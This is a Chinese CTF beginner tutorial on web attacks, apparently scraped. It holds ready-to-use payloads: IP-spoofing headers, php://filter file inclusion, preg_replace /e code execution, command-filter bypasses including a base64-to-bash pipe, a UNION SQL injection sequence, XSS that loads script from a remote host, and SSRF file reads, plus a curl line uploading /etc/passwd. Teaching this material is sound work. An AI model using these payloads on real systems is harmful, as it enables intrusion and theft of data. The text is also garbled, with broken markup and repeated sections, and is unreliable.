CTF实战入门教学文档<\/h1>

一、Web基础<\/h2>

HTTP请求方法<\/h3>

GET<\/strong>：获取服务器资源<\/li>
POST<\/strong>：发送数据，常用于更新资源<\/li>
PUT<\/strong>：新增数据记录<\/li>
PATCH<\/strong>：修改数据记录<\/li>
DELETE<\/strong>：删除数据记录<\/li>
HEAD<\/strong>：判断资源是否存在<\/li>

OPTIONS<\/strong>：获取资源约束信息<\/li> <\/ul>
HTTP请求头分析<\/h3>

Referer<\/strong>：请求来源页面<\/li>
User-Agent (UA头)<\/strong>：包含操作系统、浏览器等信息

用于设备适配或访问控制<\/li> <\/ul> <\/li> <\/ul>
HTTP响应状态码<\/h3>

状态码<\/th> 含义<\/th> <\/tr> <\/thead>

101<\/td> 协议切换(如HTTP→Websocket)<\/td> <\/tr>
200<\/td> 请求成功<\/td> <\/tr>
201<\/td> 资源创建成功(PUT响应)<\/td> <\/tr>
204<\/td> 无内容返回(网络检测)<\/td> <\/tr>
301<\/td> 永久重定向<\/td> <\/tr>
302<\/td> 临时重定向<\/td> <\/tr>
404<\/td> 资源不存在<\/td> <\/tr>
405<\/td> 方法不被允许<\/td> <\/tr>
500<\/td> 服务器内部错误<\/td> <\/tr>
502<\/td> 网关错误(后端不可达)<\/td> <\/tr>
504<\/td> 网关超时<\/td> <\/tr> <\/tbody> <\/table>
URL结构分析<\/h3>
https:\/\/url\/read-6951.html?a=1&b=2#tag5 <\/code><\/pre> scheme<\/strong>：协议(HTTP\/HTTPS\/FTP)<\/li> userinfo<\/strong>：认证信息(用户名:密码)<\/li> host<\/strong>：服务器地址\/域名\/IP<\/li> port<\/strong>：端口(HTTP:80, HTTPS:443)<\/li> path<\/strong>：资源路径(\/read-6951.html)<\/li> query<\/strong>：请求参数(a=1&b=2)<\/li> fragment<\/strong>：页面锚点(不被发送到服务器)<\/li> <\/ul> HTTP响应头<\/h3> Set-Cookie<\/strong>：服务器设置客户端凭证<\/li> <\/ul> 实战案例：本地访问限制绕过<\/h3> 使用X-Forwarded-For<\/code>、X-Client-Ip<\/code>、X-Real-Ip<\/code>等头伪造IP<\/li> 构造请求获取关键信息(如用户名密码)<\/li> <\/ol> 目录扫描工具Dirsearch<\/h3> python dirsearch.py -u https:\/\/url -e * -w \/path\/to\/dictionary.txt <\/span><\/span><\/code><\/pre> -u<\/code>：目标URL<\/li> -e<\/code>：扩展名(*为通配符)<\/li> -w<\/code>：字典路径<\/li> <\/ul> 二、PHP安全<\/h2> 弱类型漏洞<\/h3> 原理<\/strong>：<\/p> 不同类型可相互转换<\/li> 转换规则：能转换则转换('1test'→1)<\/li> 同类型可转换则转换('1'和'01'→1和1)<\/li> 同类型不可转换则字符串比较('a'和'1a')<\/li> <\/ol> <\/li> <\/ul> MD5\/HASH漏洞利用<\/h3> 条件<\/strong>：<\/p> MD5(值)结果为"0e"开头<\/li> "0e"后全为数字<\/li> 使用弱比较(==)<\/li> <\/ol> 示例<\/strong>： 0e123 == 0e234<\/code> → true(科学计数法)<\/p> PHP伪协议<\/h3> 常用协议<\/strong>：<\/p> php:\/\/filter<\/code>：文件包含时编码输出<\/li> data:\/\/<\/code>：直接包含数据<\/li> <\/ul> payload示例<\/strong>：<\/p> ?text=data:\/\/text\/plain,I have a dream&file=php:\/\/filter\/convert.base64-encode\/resource=next.php <\/code><\/pre> 代码执行函数<\/h3> eval()<\/strong>：执行PHP代码<\/li> assert()<\/strong>：直接执行输入为代码<\/li> array_map()<\/strong>：回调函数执行<\/li> 动态函数调用<\/strong>：$_GET['method']()<\/code><\/li> <\/ol> 正则替换漏洞<\/strong>：<\/p> preg_replace<\/span>('\/('<\/span>.<\/span>$re.<\/span>')\/ei'<\/span>, 'strtolower("\\1")'<\/span>, $str); <\/span><\/span><\/code><\/pre> e<\/code>修饰符：替换部分作为PHP代码执行<\/li> <\/ul> payload构造<\/strong>：<\/p> ?\S*=${getFlag()}&cmd=system('ls \/'); <\/code><\/pre> 反序列化漏洞<\/h3> 关键函数<\/strong>：<\/p> serialize()<\/code>：序列化对象<\/li> unserialize()<\/code>：反序列化<\/li> __wakeup()<\/code>：反序列化时调用<\/li> __destruct()<\/code>：对象销毁时调用<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 构造恶意序列化数据<\/li> 触发反序列化<\/li> 利用魔术方法执行代码<\/li> <\/ol> 三、常见Web漏洞<\/h2> 命令执行绕过技巧<\/h3> 空格过滤绕过<\/strong>：<\/p> %09<\/code>(tab)<\/li> %0a<\/code>(换行)<\/li> ${IFS}<\/code><\/li> $IFS$9<\/code><\/li> <\/ul> <\/li> 关键字过滤绕过<\/strong>：<\/p> 替代命令：tac<\/code>、more<\/code>等<\/li> 引号分割：ca"t<\/code>、ca""t<\/code>、ca\t<\/code><\/li> 十六进制：$(printf "\x6c\x73")<\/code>(等于ls)<\/li> Base64编码：echo Y2F0IGluZGV4LnBocA==|base64 -d|bash<\/code><\/li> 通配符：cat fl?g<\/code>、cat f*<\/code><\/li> 变量拼接：a=c;b=at;$a$b<\/code><\/li> <\/ul> <\/li> <\/ol> SQL注入<\/h3> 关键知识点<\/strong>：<\/p> information_schema<\/strong>数据库：<\/p> schemata<\/code>：schema_name<\/code>(数据库名)<\/li> tables<\/code>：table_schema<\/code>、table_name<\/code><\/li> columns<\/code>：table_schema<\/code>、table_name<\/code>、column_name<\/code><\/li> <\/ul> <\/li> 字符串拼接函数<\/strong>：<\/p> concat()<\/code>：行数据拼接<\/li> group_concat()<\/code>：列数据拼接<\/li> <\/ul> <\/li> 报错注入函数<\/strong>：<\/p> and<\/span> updatexml(1<\/span>, concat(0<\/span>x7e, (select<\/span> version<\/span>()), 0<\/span>x7e), 1<\/span>) <\/span><\/span><\/code><\/pre> 参数1：无效XML文档(触发错误)<\/li> 参数2：XPath表达式(含注入payload)<\/li> 参数3：无效更新内容(触发错误)<\/li> <\/ul> <\/li> <\/ol> 注入步骤<\/strong>：<\/p> 判断列数：order by<\/code><\/li> 获取数据库名<\/li> 获取表名<\/li> 获取列名<\/li> 获取数据<\/li> <\/ol> XSS漏洞<\/h3> 类型<\/strong>：<\/p> 反射型<\/strong>：参数控制输出<\/li> 存储型<\/strong>：恶意代码存入数据库<\/li> DOM型<\/strong>：用户输入作为JS执行<\/li> <\/ol> HTML事件利用<\/strong>：<\/p> onerror<\/code>：资源加载失败<\/li> onload<\/code>：资源加载完成<\/li> onmouseover<\/code>：鼠标悬停<\/li> onfocus<\/code>：元素获取焦点<\/li> <\/ul> 绕过技巧<\/strong>：<\/p> 大小写混合<\/strong>：<sCRiPt><\/code><\/li> 注释分割<\/strong>：\/**\/<script><\/code><\/li> 编码绕过<\/strong>：十六进制\/Base64<\/li> <\/ol> SSRF漏洞<\/h3> 危险函数<\/strong>：<\/p> file_get_contents()<\/code><\/li> readfile()<\/code><\/li> fsockopen()<\/code><\/li> <\/ul> 危险协议<\/strong>：<\/p> file:\/\/<\/code>：读取文件<\/li> gopher:\/\/<\/code>：多种协议封装<\/li> dict:\/\/<\/code>：字典协议<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 验证SSRF存在<\/li> 读取\/etc\/hosts<\/code>获取内网IP段<\/li> 扫描内网主机和端口<\/li> 构造针对性攻击<\/li> <\/ol> curl命令使用<\/strong>：<\/p> # GET请求<\/span> <\/span><\/span>curl http:\/\/example.com <\/span><\/span> <\/span><\/span># POST请求<\/span> <\/span><\/span>curl -X POST -d "data=value"<\/span> http:\/\/example.com <\/span><\/span> <\/span><\/span># 文件上传<\/span> <\/span><\/span>curl -F "f=@\/etc\/passwd"<\/span> http:\/\/example.com\/upload.php <\/span><\/span><\/code><\/pre>四、实战案例解析<\/h2> 1. 本地访问限制绕过<\/h3> 步骤<\/strong>：<\/p> 使用X-Forwarded-For<\/code>头伪造IP<\/li> 获取关键凭证信息<\/li> <\/ol> 2. 文件包含漏洞<\/h3> payload<\/strong>：<\/p> ?file=php:\/\/filter\/convert.base64-encode\/resource=index.php <\/code><\/pre> 3. 命令执行绕过<\/h3> payload<\/strong>：<\/p> cat$IFS$9`<\/span>echo$IFS$9ZmxhZy5waHA=<\/span>|base64$IFS$9-d`<\/span> <\/span><\/span><\/code><\/pre>4. SQL注入<\/h3> payload序列<\/strong>：<\/p> 判断列数：?id=1 order by 2<\/code><\/li> 获取数据库名：?id=-1 union select group_concat(schema_name),2 from information_schema.schemata<\/code><\/li> 获取表名：?id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema='database'<\/code><\/li> 获取列名：?id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='table'<\/code><\/li> 获取数据：?id=-1 union select column,1 from table<\/code><\/li> <\/ol> 5. XSS攻击<\/h3> 反射型payload<\/strong>：<\/p> ?name=<\/tEXtArEa>'"><sCRiPt sRC=\/\/xss平台><\/sCrIpT> <\/code><\/pre> DOM型payload<\/strong>：<\/p> ';<\/scirpt><script sRC=\/\/xss平台>\/\/ <\/code><\/pre> 6. SSRF利用<\/h3> 文件读取<\/strong>：<\/p> ?url=file:\/\/\/var\/www\/html\/flag.php <\/code><\/pre> 内网扫描<\/strong>：使用Burp Suite Intruder模块扫描8000-9000端口<\/p>

状态码<\/th>	含义<\/th> <\/tr> <\/thead>
101<\/td>	协议切换(如HTTP→Websocket)<\/td> <\/tr>
200<\/td>	请求成功<\/td> <\/tr>
201<\/td>	资源创建成功(PUT响应)<\/td> <\/tr>
204<\/td>	无内容返回(网络检测)<\/td> <\/tr>
301<\/td>	永久重定向<\/td> <\/tr>
302<\/td>	临时重定向<\/td> <\/tr>
404<\/td>	资源不存在<\/td> <\/tr>
405<\/td>	方法不被允许<\/td> <\/tr>
500<\/td>	服务器内部错误<\/td> <\/tr>
502<\/td>	网关错误(后端不可达)<\/td> <\/tr>
504<\/td>	网关超时<\/td> <\/tr> <\/tbody> <\/table> URL结构分析<\/h3> https:\/\/url\/read-6951.html?a=1&b=2#tag5 <\/code><\/pre> scheme<\/strong>：协议(HTTP\/HTTPS\/FTP)<\/li> userinfo<\/strong>：认证信息(用户名:密码)<\/li> host<\/strong>：服务器地址\/域名\/IP<\/li> port<\/strong>：端口(HTTP:80, HTTPS:443)<\/li> path<\/strong>：资源路径(\/read-6951.html)<\/li> query<\/strong>：请求参数(a=1&b=2)<\/li> fragment<\/strong>：页面锚点(不被发送到服务器)<\/li> <\/ul> HTTP响应头<\/h3> Set-Cookie<\/strong>：服务器设置客户端凭证<\/li> <\/ul> 实战案例：本地访问限制绕过<\/h3> 使用X-Forwarded-For<\/code>、X-Client-Ip<\/code>、X-Real-Ip<\/code>等头伪造IP<\/li> 构造请求获取关键信息(如用户名密码)<\/li> <\/ol> 目录扫描工具Dirsearch<\/h3> python dirsearch.py -u https:\/\/url -e * -w \/path\/to\/dictionary.txt <\/span><\/span><\/code><\/pre> -u<\/code>：目标URL<\/li> -e<\/code>：扩展名(为通配符)<\/li> -w<\/code>：字典路径<\/li> <\/ul> 二、PHP安全<\/h2> 弱类型漏洞<\/h3> 原理<\/strong>：<\/p> 不同类型可相互转换<\/li> 转换规则：能转换则转换('1test'→1)<\/li> 同类型可转换则转换('1'和'01'→1和1)<\/li> 同类型不可转换则字符串比较('a'和'1a')<\/li> <\/ol> <\/li> <\/ul> MD5\/HASH漏洞利用<\/h3> 条件<\/strong>：<\/p> MD5(值)结果为"0e"开头<\/li> "0e"后全为数字<\/li> 使用弱比较(==)<\/li> <\/ol> 示例<\/strong>： 0e123 == 0e234<\/code> → true(科学计数法)<\/p> PHP伪协议<\/h3> 常用协议<\/strong>：<\/p> php:\/\/filter<\/code>：文件包含时编码输出<\/li> data:\/\/<\/code>：直接包含数据<\/li> <\/ul> payload示例<\/strong>：<\/p> ?text=data:\/\/text\/plain,I have a dream&file=php:\/\/filter\/convert.base64-encode\/resource=next.php <\/code><\/pre> 代码执行函数<\/h3> eval()<\/strong>：执行PHP代码<\/li> assert()<\/strong>：直接执行输入为代码<\/li> array_map()<\/strong>：回调函数执行<\/li> 动态函数调用<\/strong>：$_GET['method']()<\/code><\/li> <\/ol> 正则替换漏洞<\/strong>：<\/p> preg_replace<\/span>('\/('<\/span>.<\/span>$re.<\/span>')\/ei'<\/span>, 'strtolower("\\1")'<\/span>, $str); <\/span><\/span><\/code><\/pre> e<\/code>修饰符：替换部分作为PHP代码执行<\/li> <\/ul> payload构造<\/strong>：<\/p> ?\S=${getFlag()}&cmd=system('ls \/'); <\/code><\/pre> 反序列化漏洞<\/h3> 关键函数<\/strong>：<\/p> serialize()<\/code>：序列化对象<\/li> unserialize()<\/code>：反序列化<\/li> __wakeup()<\/code>：反序列化时调用<\/li> __destruct()<\/code>：对象销毁时调用<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 构造恶意序列化数据<\/li> 触发反序列化<\/li> 利用魔术方法执行代码<\/li> <\/ol> 三、常见Web漏洞<\/h2> 命令执行绕过技巧<\/h3> 空格过滤绕过<\/strong>：<\/p> %09<\/code>(tab)<\/li> %0a<\/code>(换行)<\/li> ${IFS}<\/code><\/li> $IFS$9<\/code><\/li> <\/ul> <\/li> 关键字过滤绕过<\/strong>：<\/p> 替代命令：tac<\/code>、more<\/code>等<\/li> 引号分割：ca"t<\/code>、ca""t<\/code>、ca\t<\/code><\/li> 十六进制：$(printf "\x6c\x73")<\/code>(等于ls)<\/li> Base64编码：echo Y2F0IGluZGV4LnBocA==\|base64 -d\|bash<\/code><\/li> 通配符：cat fl?g<\/code>、cat f<\/code><\/li> 变量拼接：a=c;b=at;$a$b<\/code><\/li> <\/ul> <\/li> <\/ol> SQL注入<\/h3> 关键知识点<\/strong>：<\/p> information_schema<\/strong>数据库：<\/p> schemata<\/code>：schema_name<\/code>(数据库名)<\/li> tables<\/code>：table_schema<\/code>、table_name<\/code><\/li> columns<\/code>：table_schema<\/code>、table_name<\/code>、column_name<\/code><\/li> <\/ul> <\/li> 字符串拼接函数<\/strong>：<\/p> concat()<\/code>：行数据拼接<\/li> group_concat()<\/code>：列数据拼接<\/li> <\/ul> <\/li> 报错注入函数<\/strong>：<\/p> and<\/span> updatexml(1<\/span>, concat(0<\/span>x7e, (select<\/span> version<\/span>()), 0<\/span>x7e), 1<\/span>) <\/span><\/span><\/code><\/pre> 参数1：无效XML文档(触发错误)<\/li> 参数2：XPath表达式(含注入payload)<\/li> 参数3：无效更新内容(触发错误)<\/li> <\/ul> <\/li> <\/ol> 注入步骤<\/strong>：<\/p> 判断列数：order by<\/code><\/li> 获取数据库名<\/li> 获取表名<\/li> 获取列名<\/li> 获取数据<\/li> <\/ol> XSS漏洞<\/h3> 类型<\/strong>：<\/p> 反射型<\/strong>：参数控制输出<\/li> 存储型<\/strong>：恶意代码存入数据库<\/li> DOM型<\/strong>：用户输入作为JS执行<\/li> <\/ol> HTML事件利用<\/strong>：<\/p> onerror<\/code>：资源加载失败<\/li> onload<\/code>：资源加载完成<\/li> onmouseover<\/code>：鼠标悬停<\/li> onfocus<\/code>：元素获取焦点<\/li> <\/ul> 绕过技巧<\/strong>：<\/p> 大小写混合<\/strong>：<sCRiPt><\/code><\/li> 注释分割<\/strong>：\/*\/<script><\/code><\/li> 编码绕过<\/strong>：十六进制\/Base64<\/li> <\/ol> SSRF漏洞<\/h3> 危险函数<\/strong>：<\/p> file_get_contents()<\/code><\/li> readfile()<\/code><\/li> fsockopen()<\/code><\/li> <\/ul> 危险协议<\/strong>：<\/p> file:\/\/<\/code>：读取文件<\/li> gopher:\/\/<\/code>：多种协议封装<\/li> dict:\/\/<\/code>：字典协议<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 验证SSRF存在<\/li> 读取\/etc\/hosts<\/code>获取内网IP段<\/li> 扫描内网主机和端口<\/li> 构造针对性攻击<\/li> <\/ol> curl命令使用<\/strong>：<\/p> # GET请求<\/span> <\/span><\/span>curl http:\/\/example.com <\/span><\/span> <\/span><\/span># POST请求<\/span> <\/span><\/span>curl -X POST -d "data=value"<\/span> http:\/\/example.com <\/span><\/span> <\/span><\/span># 文件上传<\/span> <\/span><\/span>curl -F "f=@\/etc\/passwd"<\/span> http:\/\/example.com\/upload.php <\/span><\/span><\/code><\/pre>四、实战案例解析<\/h2> 1. 本地访问限制绕过<\/h3> 步骤<\/strong>：<\/p> 使用X-Forwarded-For<\/code>头伪造IP<\/li> 获取关键凭证信息<\/li> <\/ol> 2. 文件包含漏洞<\/h3> payload<\/strong>：<\/p> ?file=php:\/\/filter\/convert.base64-encode\/resource=index.php <\/code><\/pre> 3. 命令执行绕过<\/h3> payload<\/strong>：<\/p> cat$IFS$9`<\/span>echo$IFS$9ZmxhZy5waHA=<\/span>\|base64$IFS$9-d`<\/span> <\/span><\/span><\/code><\/pre>4. SQL注入<\/h3> payload序列<\/strong>：<\/p> 判断列数：?id=1 order by 2<\/code><\/li> 获取数据库名：?id=-1 union select group_concat(schema_name),2 from information_schema.schemata<\/code><\/li> 获取表名：?id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema='database'<\/code><\/li> 获取列名：?id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='table'<\/code><\/li> 获取数据：?id=-1 union select column,1 from table<\/code><\/li> <\/ol> 5. XSS攻击<\/h3> 反射型payload<\/strong>：<\/p> ?name=<\/tEXtArEa>'"><sCRiPt sRC=\/\/xss平台><\/sCrIpT> <\/code><\/pre> DOM型payload<\/strong>：<\/p> ';<\/scirpt><script sRC=\/\/xss平台>\/\/ <\/code><\/pre> 6. SSRF利用<\/h3> 文件读取<\/strong>：<\/p> ?url=file:\/\/\/var\/www\/html\/flag.php <\/code><\/pre> 内网扫描<\/strong>：使用Burp Suite Intruder模块扫描8000-9000端口<\/p>

CTF实战入门教学文档<\/h1>

一、Web基础<\/h2>

二、PHP安全<\/h2>

三、常见Web漏洞<\/h2>

四、实战案例解析<\/h2>

6. SSRF利用<\/h3> 文件读取<\/strong>：<\/p> ?url=file:\/\/\/var\/www\/html\/flag.php <\/code><\/pre> 内网扫描<\/strong>： 使用Burp Suite Intruder模块扫描8000-9000端口<\/p>

6. SSRF利用<\/h3>
文件读取<\/strong>：<\/p>
`?url=file:\/\/\/var\/www\/html\/flag.php <\/code><\/pre> 内网扫描<\/strong>：使用Burp Suite Intruder模块扫描8000-9000端口<\/p>`